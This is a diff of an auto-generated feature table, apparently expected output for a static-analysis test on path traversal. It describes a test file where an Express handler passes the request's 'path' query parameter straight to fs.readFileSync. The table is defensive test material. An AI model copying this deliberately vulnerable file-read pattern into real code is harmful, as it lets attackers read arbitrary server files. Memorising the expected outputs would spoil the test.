app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:13:3:13:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:13:6:13:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:13:6:13:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:13:6:13:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:13:6:13:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:13:6:13:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:13:19:13:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:13:19:13:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:13:19:13:22 | path | calleeImports | fs | @@ -7447,6 +69555,37 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:13:19:13:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:13:19:13:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:13:19:13:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | exceptional return of fs.read ... + path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | exceptional return of fs.read ... + path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | exceptional return of fs.read ... + path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | exceptional return of fs.read ... + path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | exceptional return of fs.read ... + path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | fs.read ... + path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | fs.read ... + path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | fs.read ... + path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | fs.read ... + path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:14:3:14:30 | fs.read ... + path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:14:6:14:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:14:6:14:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:14:6:14:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:14:6:14:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:14:6:14:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:14:19:14:22 | './' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:14:19:14:22 | './' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:14:19:14:22 | './' | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:14:19:14:22 | './' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:14:19:14:22 | './' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:14:19:14:22 | './' | stringConcatenatedWith | -endpoint- path | | autogenerated/TaintedPath/normalizedPaths.js:14:19:14:29 | './' + path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:14:19:14:29 | './' + path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:14:19:14:29 | './' + path | calleeImports | fs | @@ -7456,6 +69595,43 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:14:19:14:29 | './' + path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:14:19:14:29 | './' + path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:14:19:14:29 | './' + path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:14:26:14:29 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:14:26:14:29 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:14:26:14:29 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:14:26:14:29 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:14:26:14:29 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:14:26:14:29 | path | stringConcatenatedWith | './' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | exceptional return of fs.read ... .html') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | exceptional return of fs.read ... .html') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | exceptional return of fs.read ... .html') | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | exceptional return of fs.read ... .html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | exceptional return of fs.read ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | fs.read ... .html') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | fs.read ... .html') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | fs.read ... .html') | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | fs.read ... .html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:15:3:15:39 | fs.read ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:15:6:15:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:15:6:15:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:15:6:15:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:15:6:15:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:15:6:15:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:15:19:15:22 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:15:19:15:22 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:15:19:15:22 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:15:19:15:22 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:15:19:15:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:15:19:15:22 | path | stringConcatenatedWith | -endpoint- '/index.html' | | autogenerated/TaintedPath/normalizedPaths.js:15:19:15:38 | path + '/index.html' | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:15:19:15:38 | path + '/index.html' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:15:19:15:38 | path + '/index.html' | calleeImports | fs | @@ -7465,6 +69641,52 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:15:19:15:38 | path + '/index.html' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:15:19:15:38 | path + '/index.html' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:15:19:15:38 | path + '/index.html' | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:15:26:15:38 | '/index.html' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:15:26:15:38 | '/index.html' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:15:26:15:38 | '/index.html' | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:15:26:15:38 | '/index.html' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:15:26:15:38 | '/index.html' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:15:26:15:38 | '/index.html' | stringConcatenatedWith | path -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | exceptional return of fs.read ... html')) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | exceptional return of fs.read ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | exceptional return of fs.read ... html')) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | exceptional return of fs.read ... html')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | exceptional return of fs.read ... html')) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | fs.read ... html')) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | fs.read ... html')) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | fs.read ... html')) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | fs.read ... html')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:3:16:54 | fs.read ... html')) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:16:6:16:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:6:16:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:16:6:16:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:6:16:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:6:16:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:28 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:28 | pathModule | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:33 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:33 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:33 | pathModule.join | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:33 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:33 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | exceptional return of pathMod ... .html') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | exceptional return of pathMod ... .html') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | exceptional return of pathMod ... .html') | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | exceptional return of pathMod ... .html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | exceptional return of pathMod ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | pathMod ... .html') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | pathMod ... .html') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | pathMod ... .html') | calleeImports | fs | @@ -7474,6 +69696,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | pathMod ... .html') | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | pathMod ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:16:19:16:53 | pathMod ... .html') | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:16:30:16:33 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:16:30:16:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:16:30:16:33 | join | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:16:30:16:33 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:16:30:16:33 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:16:35:16:38 | path | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:16:35:16:38 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:16:35:16:38 | path | calleeImports | path | @@ -7492,6 +69719,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:16:41:16:52 | 'index.html' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:16:41:16:52 | 'index.html' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:16:41:16:52 | 'index.html' | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | exceptional return of fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | exceptional return of fs.read ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | exceptional return of fs.read ... path)) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | exceptional return of fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | exceptional return of fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | fs.read ... path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | fs.read ... path)) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:3:17:58 | fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:17:6:17:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:6:17:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:17:6:17:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:6:17:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:6:17:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:28 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:28 | pathModule | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:33 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:33 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:33 | pathModule.join | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:33 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:33 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | exceptional return of pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | exceptional return of pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | pathMod ... , path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | pathMod ... , path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | pathMod ... , path) | calleeImports | fs | @@ -7501,6 +69768,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:17:19:17:57 | pathMod ... , path) | 